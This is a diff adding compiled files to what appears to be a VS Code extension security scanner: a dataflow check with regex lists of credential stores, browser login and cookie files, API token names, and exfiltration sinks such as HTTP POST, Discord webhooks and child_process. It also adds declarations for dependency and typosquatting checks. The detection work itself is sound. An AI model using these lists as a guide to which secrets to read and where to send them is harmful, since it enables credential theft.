+        id: "CREDENTIALS",
+        name: "Credential files",
+        description: "Environment files and credential stores",
+        patterns: [
+            /\.env(?:\.local|\.production)?/gi,
+            /\.npmrc/gi,
+            /\.netrc/gi,
+            /\.git-credentials/gi,
+            /credentials\.json/gi,
+            /secrets?\./gi,
+        ],
+        apis: [
+            /readFile(?:Sync)?\s*\([^)]*\.env/gi,
+            /readFile(?:Sync)?\s*\([^)]*\.npmrc/gi,
+            /process\.env\.[A-Z_]+(?:KEY|TOKEN|SECRET|PASSWORD|CREDENTIAL)/gi,
+        ],
+    },
+    {
+        id: "BROWSER_DATA",
+        name: "Browser stored data",
+        description: "Browser cookies, passwords, and local storage",
+        patterns: [
+            /Google[/\\]Chrome[/\\].*Login\s+Data/gi,
+            /Google[/\\]Chrome[/\\].*Cookies/gi,
+            /Mozilla[/\\]Firefox[/\\].*logins\.json/gi,
+            /BraveSoftware[/\\].*Login\s+Data/gi,
+            /Microsoft[/\\]Edge[/\\].*Login\s+Data/gi,
+            /Local\s+Storage[/\\]leveldb/gi,
+        ],
+        apis: [
+            /readFile(?:Sync)?\s*\([^)]*(?:Chrome|Firefox|Edge|Brave)/gi,
+            /readFile(?:Sync)?\s*\([^)]*Login\s*Data/gi,
+        ],
+    },
+    {
+        id: "API_TOKENS",
+        name: "API tokens and keys",
+        description: "API keys and authentication tokens",
+        patterns: [
+            /(?:GITHUB|GITLAB|BITBUCKET)_(?:TOKEN|API_KEY)/gi,
+            /NPM_TOKEN/gi,
+            /OPENVSX_(?:TOKEN|PAT)/gi,
+            /(?:AWS|AZURE|GCP)_(?:ACCESS_KEY|SECRET|TOKEN)/gi,
+            /OPENAI_API_KEY/gi,
+            /ANTHROPIC_API_KEY/gi,
+        ],
+        apis: [/process\.env\.(?:GITHUB|GITLAB|NPM|AWS|AZURE|OPENAI|ANTHROPIC)/gi],
+    },
+];
+// Sinks: Where data leaves the system
+const SINKS = [
+    {
+        id: "NETWORK_SEND",
+        name: "Network transmission",
+        description: "HTTP requests that send data externally",
+        patterns: [
+            /fetch\s*\([^)]*,\s*\{[^}]*method\s*:\s*['"](?:POST|PUT)/gi,
+            /axios\.(?:post|put)\s*\(/gi,
+            /https?\.request\s*\([^)]*method\s*:\s*['"](?:POST|PUT)/gi,
+            /request\.(?:post|put)\s*\(/gi,
+            /got\.(?:post|put)\s*\(/gi,
+            /superagent\.(?:post|put)\s*\(/gi,
+        ],
+    },
+    {
+        id: "WEBSOCKET_SEND",
+        name: "WebSocket transmission",
+        description: "Data sent over WebSocket connections",
+        patterns: [/\.send\s*\([^)]+\)/gi, /WebSocket\s*\([^)]*\)/gi, /ws\.send\s*\(/gi],
+    },
+    {
+        id: "DISCORD_WEBHOOK",
+        name: "Discord webhook",
+        description: "Discord webhook exfiltration",
+        patterns: [/discord\.com\/api\/webhooks/gi, /discordapp\.com\/api\/webhooks/gi],
+    },
+    {
+        id: "EVAL_EXEC",
+        name: "Code execution",
+        description: "eval or Function constructor",
+        patterns: [
+            /\beval\s*\(/gi,
+            /new\s+Function\s*\(/gi,
+            /\(\s*\)\s*\[\s*['"]constructor['"]\s*\]/gi,
+        ],
+    },
+    {
+        id: "CHILD_PROCESS",
+        name: "Shell execution",
+        description: "Command execution via child_process",
+        patterns: [
+            /child_process\.(?:exec|execSync|spawn|spawnSync)\s*\(/gi,
+            /(?:exec|execSync|spawn|spawnSync)\s*\([^)]*\$\{/gi,
+        ],
+    },
+];
+// Critical data flow combinations
+const FLOW_RULES = [
+    {
+        id: "FLOW_SSH_KEY_EXFIL",
+        title: "SSH key exfiltration pattern",
+        description: "Code reads SSH private keys and sends data over network. This is a credential theft pattern.",
+        severity: "critical",
+        source: "SSH_KEYS",
+        sink: "NETWORK_SEND",
+        redFlags: ["Reads .ssh directory", "Sends to external URL"],
+    },
+    {
+        id: "FLOW_WALLET_EXFIL",
+        title: "Cryptocurrency wallet exfiltration",
+        description: "Code accesses cryptocurrency wallet data and sends it over network. This is a crypto theft pattern.",
+        severity: "critical",
+        source: "CRYPTO_WALLETS",
+        sink: "NETWORK_SEND",
+        redFlags: ["Accesses wallet files", "Sends to external server"],
+    },
+    {
+        id: "FLOW_CRED_EXFIL",
+        title: "Credential exfiltration pattern",
+        description: "Code reads credential files (.env, .npmrc, etc.) and sends data over network.",
+        severity: "critical",
+        source: "CREDENTIALS",
+        sink: "NETWORK_SEND",
+        redFlags: ["Reads environment files", "HTTP POST to external"],
+    },
+    {
+        id: "FLOW_BROWSER_EXFIL",
+        title: "Browser data exfiltration",
+        description: "Code accesses browser stored passwords/cookies and sends them over network.",
+        severity: "critical",
+        source: "BROWSER_DATA",
+        sink: "NETWORK_SEND",
+        redFlags: ["Reads Chrome/Firefox data", "Network exfiltration"],
+    },
+    {
+        id: "FLOW_TOKEN_EXFIL",
+        title: "API token exfiltration",
+        description: "Code accesses API tokens from environment and sends them to external server.",
+        severity: "critical",
+        source: "API_TOKENS",
+        sink: "NETWORK_SEND",
+        legitimateUses: ["Token validation services", "OAuth flows"],
+        redFlags: ["Tokens sent to unknown domains", "No user consent"],
+    },
+    {
+        id: "FLOW_SSH_DISCORD",
+        title: "SSH key sent to Discord",
+        description: "Code reads SSH keys and sends them to Discord webhook. This is a common exfiltration technique.",
+        severity: "critical",
+        source: "SSH_KEYS",
+        sink: "DISCORD_WEBHOOK",
+    },
+    {
+        id: "FLOW_CRED_DISCORD",
+        title: "Credentials sent to Discord",
+        description: "Code reads credentials and sends them to Discord webhook for exfiltration.",
+        severity: "critical",
+        source: "CREDENTIALS",
+        sink: "DISCORD_WEBHOOK",
+    },
+    {
+        id: "FLOW_SSH_EXEC",
+        title: "SSH key used in command execution",
+        description: "SSH key content is passed to command execution, potentially for remote access.",
+        severity: "high",
+        source: "SSH_KEYS",
+        sink: "CHILD_PROCESS",
+        legitimateUses: ["SSH key management tools", "Git operations"],
+        redFlags: ["Key content passed to exec", "Unknown remote commands"],
+    },
+];
+/**
+ * Find all matches for a set of patterns
+ */
+function findMatches(content, patterns) {
+    const matches = [];
+    for (const pattern of patterns) {
+        const regex = new RegExp(pattern.source, pattern.flags);
+        let match;
+        while ((match = regex.exec(content)) !== null) {
+            matches.push({
+                index: match.index,
+                matched: match[0].slice(0, 80),
+            });
+        }
+    }
+    return matches;
+}
+/**
+ * Check if source and sink are in proximity (within same function/block)
+ * Uses a simple heuristic: within 2000 characters of each other
+ */
+function areInProximity(sourceIndex, sinkIndex, maxDistance = 2000) {
+    return Math.abs(sourceIndex - sinkIndex) < maxDistance;
+}
+export function checkDataFlow(contents) {
+    const findings = [];
+    const seenFindings = new Set();
+    for (const [filename, buffer] of contents.files) {
+        if (!isScannable(filename, SCANNABLE_EXTENSIONS_PATTERN))
+            continue;
+        const content = buffer.toString("utf8");
+        // Find all source and sink matches
+        const sourceMatches = new Map();
+        const sinkMatches = new Map();
+        for (const source of SOURCES) {
+            const matches = [
+                ...findMatches(content, source.patterns),
+                ...findMatches(content, source.apis),
+            ];
+            if (matches.length > 0) {
+                sourceMatches.set(source.id, matches);
+            }
+        }
+        for (const sink of SINKS) {
+            const matches = findMatches(content, sink.patterns);
+            if (matches.length > 0) {
+                sinkMatches.set(sink.id, matches);
+            }
+        }
+        // Check each flow rule
+        for (const rule of FLOW_RULES) {
+            const sources = sourceMatches.get(rule.source);
+            const sinks = sinkMatches.get(rule.sink);
+            if (!sources || !sinks)
+                continue;
+            // Find the closest source-sink pair
+            let closestPair = null;
+            for (const sourceMatch of sources) {
+                for (const sinkMatch of sinks) {
+                    if (areInProximity(sourceMatch.index, sinkMatch.index)) {
+                        const distance = Math.abs(sourceMatch.index - sinkMatch.index);
+                        if (!closestPair || distance < closestPair.distance) {
+                            closestPair = { sourceMatch, sinkMatch, distance };
+                        }
+                    }
+                }
+            }
+            if (!closestPair)
+                continue;
+            // Deduplicate
+            const key = `${rule.id}:${filename}`;
+            if (seenFindings.has(key))
+                continue;
+            seenFindings.add(key);
+            const source = SOURCES.find((s) => s.id === rule.source);
+            const sink = SINKS.find((s) => s.id === rule.sink);
+            findings.push({
+                id: rule.id,
+                title: rule.title,
+                description: rule.description,
+                severity: rule.severity,
+                category: "dataflow",
+                location: {
+                    file: filename,
+                    line: findLineNumberByIndex(content, closestPair.sourceMatch.index),
+                },
+                metadata: {
+                    source: {
+                        type: source?.name ?? rule.source,
+                        matched: closestPair.sourceMatch.matched,
+                    },
+                    sink: {
+                        type: sink?.name ?? rule.sink,
+                        matched: closestPair.sinkMatch.matched,
+                        line: findLineNumberByIndex(content, closestPair.sinkMatch.index),
+                    },
+                    distance: closestPair.distance,
+                    ...(rule.legitimateUses && { legitimateUses: rule.legitimateUses }),
+                    ...(rule.redFlags && { redFlags: rule.redFlags }),
+                },
+            });
+        }
+    }
+    return findings;
+}
+//# sourceMappingURL=dataflow.js.map

package/dist/scanner/checks/dataflow.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"dataflow.js","sourceRoot":"","sources":["../../../src/scanner/checks/dataflow.ts"],"names":[],"mappings":"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"}

package/dist/scanner/checks/dependencies.d.ts

@@ -0,0 +1,13 @@
+import type { Finding, VsixContents, ZooData } from "../types.js";
+interface PackageJson {
+    name?: string;
+    dependencies?: Record<string, string>;
+    devDependencies?: Record<string, string>;
+    scripts?: Record<string, string>;
+}
+export declare function checkMaliciousPackages(packageJson: PackageJson, maliciousPackages: Set<string>): Finding[];
+export declare function checkTyposquattingPackages(packageJson: PackageJson): Finding[];
+export declare function checkLifecycleScripts(packageJson: PackageJson): Finding[];
+export declare function checkDependencies(contents: VsixContents, zooData: ZooData): Finding[];
+export {};
+//# sourceMappingURL=dependencies.d.ts.map

package/dist/scanner/checks/dependencies.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"dependencies.d.ts","sourceRoot":"","sources":["../../../src/scanner/checks/dependencies.ts"],"names":[],"mappings":"AAAA,OAAO,KAAK,EAAE,OAAO,EAAE,YAAY,EAAE,OAAO,EAAE,MAAM,aAAa,CAAC;AAElE,UAAU,WAAW;IACnB,IAAI,CAAC,EAAE,MAAM,CAAC;IACd,YAAY,CAAC,EAAE,MAAM,CAAC,MAAM,EAAE,MAAM,CAAC,CAAC;IACtC,eAAe,CAAC,EAAE,MAAM,CAAC,MAAM,EAAE,MAAM,CAAC,CAAC;IACzC,OAAO,CAAC,EAAE,MAAM,CAAC,MAAM,EAAE,MAAM,CAAC,CAAC;CAClC;AAoHD,wBAAgB,sBAAsB,CACpC,WAAW,EAAE,WAAW,EACxB,iBAAiB,EAAE,GAAG,CAAC,MAAM,CAAC,GAC7B,OAAO,EAAE,CA0BX;AAED,wBAAgB,0BAA0B,CAAC,WAAW,EAAE,WAAW,GAAG,OAAO,EAAE,CA6B9E;AAED,wBAAgB,qBAAqB,CAAC,WAAW,EAAE,WAAW,GAAG,OAAO,EAAE,CAuDzE;AAED,wBAAgB,iBAAiB,CAAC,QAAQ,EAAE,YAAY,EAAE,OAAO,EAAE,OAAO,GAAG,OAAO,EAAE,CAqBrF"}